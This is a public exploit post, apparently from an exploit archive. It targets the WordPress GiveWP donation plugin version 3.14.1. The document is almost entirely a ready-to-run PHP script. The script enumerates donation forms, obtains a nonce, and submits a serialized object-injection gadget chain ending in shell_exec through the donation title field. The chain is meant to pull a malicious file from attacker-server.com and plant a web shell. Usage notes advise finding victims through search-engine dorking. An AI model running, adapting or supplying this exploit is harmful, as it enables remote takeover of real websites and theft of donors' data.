| # Title : WordPress GiveWP Donation Fundraising Platform 3.14.1 php code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://givewp.com/ |
=============================================================================================================================================
POC :
[+] Dorking Ä°n Google Or Other Search Enggine.
[+] The following php code Upload shell file from external link.
[+] Line 78 set your file link.
[+] Line 127. set your target.
[+] save code as poc.php .
[+] USage : cmd = php poc.php .
[+] PayLoad :
<?php
class GiveWPExploit {
private $targetUrl;
private $headers;
public function __construct($targetUrl) {
$this->targetUrl = $targetUrl;
$this->headers = array(
'Content-Type: application/x-www-form-urlencoded'
);
}
public function check() {
$response = $this->sendRequest('POST', $this->targetUrl . '/wp-admin/admin-ajax.php', array('action' => 'give_form_search'));
if (!$response || $response['http_code'] != 200) {
echo "Failed to retrieve form list. ";
return false;
}
$forms = json_decode($response['body'], true);
if (empty($forms)) {
echo "No forms found. ";
return false;
}
echo "Successfully retrieved form list. Available Form IDs: " . implode(', ', array_column($forms, 'id')) . " ";
return $forms;
}
public function exploit() {
$forms = $this->check();
if (!$forms) {
return;
}
$selectedForm = $forms[array_rand($forms)];
$validForm = $this->retrieveAndAnalyzeForm($selectedForm['id']);
if (!$validForm) {
echo "Failed to retrieve a valid form for exploitation. ";
return;
}
echo "Using Form ID: " . $validForm['give_form_id'] . " for exploitation. ";
$this->sendExploitRequest($validForm);
}
private function retrieveAndAnalyzeForm($formId) {
$response = $this->sendRequest('POST', $this->targetUrl . '/wp-admin/admin-ajax.php', array(
'action' => 'give_donation_form_nonce',
'give_form_id' => $formId
));
if (!$response || $response['http_code'] != 200) {
return false;
}
$formData = json_decode($response['body'], true);
$giveFormId = $formId;
$giveFormHash = $formData['data'];
$givePriceId = '0'; // Default price ID
$giveAmount = '$10.00'; // Default amount
if (!$giveFormHash) {
return false;
}
return array(
'give_form_id' => $giveFormId,
'give_form_hash' => $giveFormHash,
'give_price_id' => $givePriceId,
'give_amount' => $giveAmount
);
}
private function sendExploitRequest($validForm) {
// URL of the malicious file to be fetched
$remoteFileUrl = 'http://attacker-server.com/malicious-file.php';
// Payload that uses file_get_contents to fetch the remote file
$payload = sprintf(
'O:19:"Stripe\\StripeObject":1:{s:10:"\0*\0_values";a:1:{s:3:"foo";O:62:"Give\\PaymentGateways\\DataTransferObjects\\GiveInsertPaymentData":1:{s:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:12:"\0*\0container";O:33:"Give\\Vendors\\Faker\\ValidGenerator":3:{s:10:"shell_exec";s:12:"\0*\0generator";O:34:"Give\\Onboarding\\SettingsRepository":1:{s:11:"\0*\0settings";a:1:{s:8:"address1";s:%d:"%s";}}}}}}}}',
strlen($remoteFileUrl),
$remoteFileUrl
);
$data = array(
'give-form-id' => $validForm['give_form_id'],
'give-form-hash' => $validForm['give_form_hash'],
'give-price-id' => $validForm['give_price_id'],
'give-amount' => $validForm['give_amount'],
'give_first' => 'Test',
'give_last' => 'User',
'give_email' => 'test@example.com',
'give_title' => $payload,
'give-gateway' => 'offline',
'action' => 'give_process_donation'
);
$this->sendRequest('POST', $this->targetUrl . '/wp-admin/admin-ajax.php', $data);
}
private function sendRequest($method, $url, $data) {
$options = array(
'http' => array(
'method' => $method,
'header' => implode(" ", $this->headers),
'content' => http_build_query($data)
)
);
$context = stream_context_create($options);
$result = file_get_contents($url, false, $context);
if ($result === false) {
return false;
}
return array(
'http_code' => (int) substr($http_response_header[0], 9, 3), // Get the HTTP code
'body' => $result
);
}
}
// Usage
$exploit = new GiveWPExploit('http://127.0.0.1');
$exploit->exploit();
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================